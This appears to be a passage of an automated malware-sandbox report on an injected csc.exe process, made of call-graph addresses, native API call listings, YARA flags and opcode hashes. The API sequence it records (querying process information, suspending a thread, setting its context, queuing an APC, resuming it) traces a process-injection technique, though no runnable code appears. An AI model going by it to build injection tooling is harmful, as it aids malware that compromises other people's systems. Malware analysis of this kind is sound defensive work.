93713->93716 93714->93603 93715 41435c 93715->93603 93716->93715 93843 41cf30 93716->93843 93718 4140dd 93719 41cf30 2 API calls 93718->93719 93722 4140e8 93719->93722 93720 414136 93723 41cf30 2 API calls 93720->93723 93722->93720 93724 41d060 3 API calls 93722->93724 93854 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 93722->93854 93726 41414a 93723->93726 93724->93722 93725 4141a7 93727 41cf30 2 API calls 93725->93727 93726->93725 93848 41d060 93726->93848 93728 4141bd 93727->93728 93730 4141fa 93728->93730 93732 41d060 3 API calls 93728->93732 93731 41cf30 2 API calls 93730->93731 93733 414205 93731->93733 93732->93728 93734 41d060 3 API calls 93733->93734 93740 41423f 93733->93740 93734->93733 93736 414334 93856 41cf90 LdrLoadDll RtlFreeHeap 93736->93856 93738 41433e 93857 41cf90 LdrLoadDll RtlFreeHeap 93738->93857 93855 41cf90 LdrLoadDll RtlFreeHeap 93740->93855 93741 414348 93858 41cf90 LdrLoadDll RtlFreeHeap 93741->93858 93743 414352 93859 41cf90 LdrLoadDll RtlFreeHeap 93743->93859 93746 4153a1 93745->93746 93747 414a50 8 API calls 93746->93747 93749 4153b7 93747->93749 93748 41540a 93748->93607 93749->93748 93750 4153f2 93749->93750 93751 415405 93749->93751 93752 41bdc0 2 API calls 93750->93752 93753 41bdc0 2 API calls 93751->93753 93754 4153f7 93752->93754 93753->93748 93754->93607 93756 41ad84 93755->93756 93757 41ac30 LdrLoadDll 93755->93757 93860 41ac30 93756->93860 93757->93756 93760 41ac30 LdrLoadDll 93761 41ad96 93760->93761 93762 41ac30 LdrLoadDll 93761->93762 93763 41ad9f 93762->93763 93764 41ac30 LdrLoadDll 93763->93764 93765 41ada8 93764->93765 93766 41ac30 LdrLoadDll 93765->93766 93767 41adb1 93766->93767 93768 41ac30 LdrLoadDll 93767->93768 93769 41adbd 93768->93769 93770 41ac30 LdrLoadDll 93769->93770 93771 41adc6 93770->93771 93772 41ac30 LdrLoadDll 93771->93772 93773 41adcf 93772->93773 93774 41ac30 LdrLoadDll 93773->93774 93775 41add8 93774->93775 93776 41ac30 LdrLoadDll 93775->93776 93777 41ade1 93776->93777 93778 41ac30 LdrLoadDll 93777->93778 93779 41adea 93778->93779 93780 41ac30 LdrLoadDll 93779->93780 93781 41adf6 93780->93781 93782 41ac30 LdrLoadDll 93781->93782 93783 41adff 93782->93783 93784 41ac30 LdrLoadDll 93783->93784 93785 41ae08 93784->93785 93786 41ac30 LdrLoadDll 93785->93786 93787 41ae11 93786->93787 93788 41ac30 LdrLoadDll 93787->93788 93789 41ae1a 93788->93789 93790 41ac30 LdrLoadDll 93789->93790 93791 41ae23 93790->93791 93792 41ac30 LdrLoadDll 93791->93792 93793 41ae2f 93792->93793 93794 41ac30 LdrLoadDll 93793->93794 93795 41ae38 93794->93795 93796 41ac30 LdrLoadDll 93795->93796 93797 41ae41 93796->93797 93798 41ac30 LdrLoadDll 93797->93798 93799 41ae4a 93798->93799 93800 41ac30 LdrLoadDll 93799->93800 93801 41ae53 93800->93801 93802 41ac30 LdrLoadDll 93801->93802 93803 41ae5c 93802->93803 93804 41ac30 LdrLoadDll 93803->93804 93805 41ae68 93804->93805 93806 41ac30 LdrLoadDll 93805->93806 93807 41ae71 93806->93807 93808 41ac30 LdrLoadDll 93807->93808 93809 41ae7a 93808->93809 93810 41ac30 LdrLoadDll 93809->93810 93811 41ae83 93810->93811 93812 41ac30 LdrLoadDll 93811->93812 93813 41ae8c 93812->93813 93814 41ac30 LdrLoadDll 93813->93814 93815 41ae95 93814->93815 93816 41ac30 LdrLoadDll 93815->93816 93817 41aea1 93816->93817 93818 41ac30 LdrLoadDll 93817->93818 93819 41aeaa 93818->93819 93820 41ac30 LdrLoadDll 93819->93820 93821 41aeb3 93820->93821 93822 41ac30 LdrLoadDll 93821->93822 93823 41aebc 93822->93823 93824 41ac30 LdrLoadDll 93823->93824 93825 41aec5 93824->93825 93826 41ac30 LdrLoadDll 93825->93826 93827 41aece 93826->93827 93828 41ac30 LdrLoadDll 93827->93828 93829 41aeda 93828->93829 93830 41ac30 LdrLoadDll 93829->93830 93831 41aee3 93830->93831 93832 41ac30 LdrLoadDll 93831->93832 93833 41aeec 93832->93833 93833->93611 93835 41af60 LdrLoadDll 93834->93835 93836 419edc 93835->93836 93866 5602df0 LdrInitializeThunk 93836->93866 93837 419ef3 93837->93531 93839->93608 93841 41af60 LdrLoadDll 93840->93841 93842 41a55c NtAllocateVirtualMemory 93841->93842 93842->93712 93844 41cf40 93843->93844 93845 41cf46 93843->93845 93844->93718 93846 41bf90 2 API calls 93845->93846 93847 41cf6c 93846->93847 93847->93718 93849 41cfd0 93848->93849 93850 41bf90 2 API calls 93849->93850 93853 41d02d 93849->93853 93851 41d00a 93850->93851 93852 41bdc0 2 API calls 93851->93852 93852->93853 93853->93726 93854->93722 93855->93736 93856->93738 93857->93741 93858->93743 93859->93715 93861 41ac4b 93860->93861 93862 414e50 LdrLoadDll 93861->93862 93863 41ac6b 93862->93863 93864 414e50 LdrLoadDll 93863->93864 93865 41ad17 93863->93865 93864->93865 93865->93760 93866->93837 93868 5602c11 93867->93868 93869 5602c1f LdrInitializeThunk 93867->93869 93868->93617 93869->93617 93871 41af60 LdrLoadDll 93870->93871 93872 41a68c RtlFreeHeap 93871->93872 93872->93621 93874 407eb0 93873->93874 93875 407eab 93873->93875 93876 41bd40 2 API calls 93874->93876 93875->93539 93879 407ed5 93876->93879 93877 407f38 93877->93539 93878 419ec0 2 API calls 93878->93879 93879->93877 93879->93878 93880 407f3e 93879->93880 93884 41bd40 2 API calls 93879->93884 93889 41a5c0 93879->93889 93881 407f64 93880->93881 93883 41a5c0 2 API calls 93880->93883 93881->93539 93885 407f55 93883->93885 93884->93879 93885->93539 93887 41a5c0 2 API calls 93886->93887 93888 40817e 93887->93888 93888->93500 93890 41af60 LdrLoadDll 93889->93890 93891 41a5dc 93890->93891 93894 5602c70 LdrInitializeThunk 93891->93894 93892 41a5f3 93892->93879 93894->93892 93896 41b5c3 93895->93896 93899 40acf0 93896->93899 93900 40ad14 93899->93900 93901 40ad50 LdrLoadDll 93900->93901 93902 409c4a 93900->93902 93901->93902 93902->93506 93904 40b063 93903->93904 93906 40b0e0 93904->93906 93918 419c90 LdrLoadDll 93904->93918 93906->93513 93908 41af60 LdrLoadDll 93907->93908 93909 40f1bb 93908->93909 93909->93516 93910 41a7d0 93909->93910 93911 41a7ef LookupPrivilegeValueW 93910->93911 93912 41af60 LdrLoadDll 93910->93912 93911->93518 93912->93911 93914 41a27c 93913->93914 93915 41af60 LdrLoadDll 93913->93915 93919 5602ea0 LdrInitializeThunk 93914->93919 93915->93914 93916 41a29b 93916->93519 93918->93906 93919->93916 93921 40b1f0 93920->93921 93922 40b040 LdrLoadDll 93921->93922 93923 40b204 93922->93923 93923->93455 93925 40ae51 93924->93925 93926 40ae4d 93924->93926 93927 40ae6a 93925->93927 93928 40ae9c 93925->93928 93926->93458 93971 419cd0 LdrLoadDll 93927->93971 93972 419cd0 LdrLoadDll 93928->93972 93930 40aead 93930->93458 93932 40ae8c 93932->93458 93934 40f4a0 3 API calls 93933->93934 93935 4143c6 93933->93935 93934->93935 93935->93460 93973 4087a0 93936->93973 93939 408a9d 93939->93462 93940 4087a0 19 API calls 93941 408a8a 93940->93941 93941->93939 93991 40f710 10 API calls 93941->93991 93944 41af60 LdrLoadDll 93943->93944 93945 41a51c 93944->93945 94110 5602e80 LdrInitializeThunk 93945->94110 93946 40c322 93948 40f4a0 93946->93948 93949 40f4bd 93948->93949 94111 419fc0 93949->94111 93952 40f505 93952->93466 93953 41a010 2 API calls 93954 40f52e 93953->93954 93954->93466 93956 41a016 93955->93956 93957 41af60 LdrLoadDll 93956->93957 93958 41a02c 93957->93958 94117 5602d10 LdrInitializeThunk 93958->94117 93959 40c385 93959->93472 93959->93475 93962 41af60 LdrLoadDll 93961->93962 93963 41a07c 93962->93963 94118 5602d30 LdrInitializeThunk 93963->94118 93964 40c459 93964->93483 93967 41af60 LdrLoadDll 93966->93967 93968 419e3c 93967->93968 94119 5602fb0 LdrInitializeThunk 93968->94119 93969 40c4ac 93969->93487 93971->93932 93972->93930 93974 407ea0 4 API calls 93973->93974 93989 4087ba 93974->93989 93975 408a49 93975->93939 93975->93940 93976 408a3f 93977 408160 2 API calls 93976->93977 93977->93975 93980 419f00 2 API calls 93980->93989 93982 41a490 LdrLoadDll NtClose 93982->93989 93985 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93985->93989 93988 419e20 2 API calls 93988->93989 93989->93975 93989->93976 93989->93980 93989->93982 93989->93985 93989->93988 93992 419d10 93989->93992 93995 4085d0 93989->93995 94007 40f5f0 LdrLoadDll NtClose 93989->94007 94008 419d90 LdrLoadDll 93989->94008 94009 419dc0 LdrLoadDll 93989->94009 94010 419e50 LdrLoadDll 93989->94010 94011 4083a0 93989->94011 94027 405f60 LdrLoadDll 93989->94027 93991->93939 93993 419d2c 93992->93993 93994 41af60 LdrLoadDll 93992->93994 93993->93989 93994->93993 93996 4085e6 93995->93996 93999 4085ff 93996->93999 94028 419880 93996->94028 93998 408771 93998->93989 93999->93998 94049 4081a0 93999->94049 94001 4086e5 94001->93998 94002 4083a0 11 API calls 94001->94002 94003 408713 94002->94003 94003->93998 94004 419f00 2 API calls 94003->94004 94005 408748 94004->94005 94005->93998 94006 41a500 2 API calls 94005->94006 94006->93998 94007->93989 94008->93989 94009->93989 94010->93989 94012 4083c9 94011->94012 94089 408310 94012->94089 94015 41a500 2 API calls 94016 4083dc 94015->94016 94016->94015 94017 408467 94016->94017 94019 408462 94016->94019 94097 40f670 94016->94097 94017->93989 94018 41a490 2 API calls 94020 40849a 94018->94020 94019->94018 94020->94017 94021 419d10 LdrLoadDll 94020->94021 94022 4084ff 94021->94022 94022->94017 94101 419d50 94022->94101 94024 408563 94024->94017 94025 414a50 8 API calls 94024->94025 94026 4085b8 94025->94026 94026->93989 94027->93989 94029 41bf90 2 API calls 94028->94029 94030 419897 94029->94030 94056 409310 94030->94056 94032 4198b2 94033 4198f0 94032->94033 94034 4198d9 94032->94034 94037 41bd40 2 API calls 94033->94037 94035 41bdc0 2 API calls 94034->94035 94036 4198e6 94035->94036 94036->93999 94038 41992a 94037->94038 94039 41bd40 2 API calls 94038->94039 94040 419943 94039->94040 94046 419be4 94040->94046 94062 41bd80 94040->94062 94043 419bd0 94044 41bdc0 2 API calls 94043->94044 94045 419bda 94044->94045 94045->93999 94047 41bdc0 2 API calls 94046->94047 94048 419c39 94047->94048 94048->93999 94050 40829f 94049->94050 94051 4081b5 94049->94051 94050->94001 94051->94050 94052 414a50 8 API calls 94051->94052 94053 408222 94052->94053 94054 41bdc0 2 API calls 94053->94054 94055 408249 94053->94055 94054->94055 94055->94001 94057 409335 94056->94057 94058 40acf0 LdrLoadDll 94057->94058 94059 409368 94058->94059 94061 40938d 94059->94061 94065 40cf20 94059->94065 94061->94032 94063 419bc9 94062->94063 94083 41a580 94062->94083 94063->94043 94063->94046 94066 40cf4c 94065->94066 94067 41a1e0 LdrLoadDll 94066->94067 94068 40cf65 94067->94068 94069 40cf6c 94068->94069 94076 41a220 94068->94076 94069->94061 94073 40cfa7 94074 41a490 2 API calls 94073->94074 94075 40cfca 94074->94075 94075->94061 94077 41af60 LdrLoadDll 94076->94077 94078 41a23c 94077->94078 94082 5602ca0 LdrInitializeThunk 94078->94082 94079 40cf8f 94079->94069 94081 41a810 LdrLoadDll 94079->94081 94081->94073 94082->94079 94084 41af60 LdrLoadDll 94083->94084 94085 41a59c 94084->94085 94088 5602f90 LdrInitializeThunk 94085->94088 94086 41a5b7 94086->94063 94088->94086 94090 408328 94089->94090 94091 40acf0 LdrLoadDll 94090->94091 94092 408343 94091->94092 94093 414e50 LdrLoadDll 94092->94093 94094 408353 94093->94094 94095 40835c PostThreadMessageW 94094->94095 94096 408370 94094->94096 94095->94096 94096->94016 94098 40f683 94097->94098 94104 419e90 94098->94104 94102 41af60 LdrLoadDll 94101->94102 94103 419d6c 94102->94103 94103->94024 94105 419eac 94104->94105 94106 41af60 LdrLoadDll 94104->94106 94109 5602dd0 LdrInitializeThunk 94105->94109 94106->94105 94107 40f6ae 94107->94016 94109->94107 94110->93946 94112 41af60 LdrLoadDll 94111->94112 94113 419fdc 94112->94113 94116 5602f30 LdrInitializeThunk 94113->94116 94114 40f4fe 94114->93952 94114->93953 94116->94114 94117->93959 94118->93964 94119->93969 94120 510cb84 94123 510a042 94120->94123 94122 510cba5 94125 510a06b 94123->94125 94124 510a577 94124->94122 94125->94124 94126 510a182 NtQueryInformationProcess 94125->94126 94127 510a1ba 94126->94127 94128 510a2fc NtSuspendThread 94127->94128 94130 510a1ef 94127->94130 94129 510a30d 94128->94129 94131 510a331 94128->94131 94129->94122 94130->94122 94132 510a4a6 NtSetContextThread 94131->94132 94134 510a4f2 94131->94134 94135 510a4bd 94132->94135 94133 510a552 NtResumeThread NtClose 94133->94124 94134->94133 94135->94134 94136 510a4da NtQueueApcThread 94135->94136 94136->94134

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL ref: 0510A19F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191589161.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5100000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1778838933-4108050209
                                                                                                                                                                        • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                        • Instruction ID: fe9dd7e7b0b0c2e715e31550d0626ecd1c021dd4df7530c907bbb1ee24ecd1d8
                                                                                                                                                                        • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                        • Instruction Fuzzy Hash: 4BF16274618A4C8FDBA5EF68C898AEEB7E0FF98304F40462AD44ED7291DF749542CB41

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 102 41a40a-41a459 call 41af60 NtReadFile
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID: 1JA$rMA$rMA
                                                                                                                                                                        • API String ID: 2738559852-782607585
                                                                                                                                                                        • Opcode ID: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                                                                                                                                                        • Instruction ID: 6fb213b5ecae9b2d78436e96d981fe4cc20fd8036c0d356658e2c76b782acd04
                                                                                                                                                                        • Opcode Fuzzy Hash: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                                                                                                                                                        • Instruction Fuzzy Hash: F0F0F4B2200118ABCB08DF99DC80EEB77ADEF8C754F158248BE0D97241D630E811CBA0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 105 41a410-41a426 106 41a42c-41a459 NtReadFile 105->106 107 41a427 call 41af60 105->107 107->106
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID: 1JA$rMA$rMA
                                                                                                                                                                        • API String ID: 2738559852-782607585
                                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL ref: 0510A19F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191589161.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5100000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1778838933-4108050209
                                                                                                                                                                        • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                        • Instruction ID: 51d2228eff5545b0ac5efcd94f015b204564650c63d0afebbfd93b64ad6b756c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 79515E70918A8C8FDB69EF68C8846EEBBF4FB98304F40462ED44AD7251DF749645CB41

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 412 41a3b2-41a3b6 413 41a3b8-41a3d6 412->413 414 41a39c-41a3b1 NtCreateFile 412->414 416 41a3dc-41a409 413->416 417 41a3d7 call 41af60 413->417 417->416
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                                                                                                                                                        • Instruction ID: a7a1a1cfa9bd20287bf16b9f77af049775cbda1b728cc0b5c91c8d781c512f10
                                                                                                                                                                        • Opcode Fuzzy Hash: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                                                                                                                                                        • Instruction Fuzzy Hash: E001EDB6200108AFCB08DF99DC84DEB77ADEF8C724F158659FA1D97290C630E951CBA4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 449 40acf0-40ad0c 450 40ad14-40ad19 449->450 451 40ad0f call 41cc50 449->451 452 40ad1b-40ad1e 450->452 453 40ad1f-40ad2d call 41d070 450->453 451->450 456 40ad3d-40ad4e call 41b4a0 453->456 457 40ad2f-40ad3a call 41d2f0 453->457 462 40ad50-40ad64 LdrLoadDll 456->462 463 40ad67-40ad6a 456->463 457->456 462->463
                                                                                                                                                                        APIs
                                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Load
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                                                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 470 41a35b-41a3b1 call 41af60 NtCreateFile
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                                                                                                                                                        • Instruction ID: f7f4107286774cdf51585c7b95314371371209a0b209ae894d56bd91292c74bc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2801B2B2201108AFCB58DF99DC95EEB77A9EF8C754F158248FA0DD7241D630E851CBA4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 474 41a360-41a376 475 41a37c-41a3b1 NtCreateFile 474->475 476 41a377 call 41af60 474->476 476->475
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                        • Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                        • Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
                                                                                                                                                                        • Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                        • Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 9d63af0f16ba26e89763d08fa87002c15c3e2858b6d0b868065174ad2b2d88d2
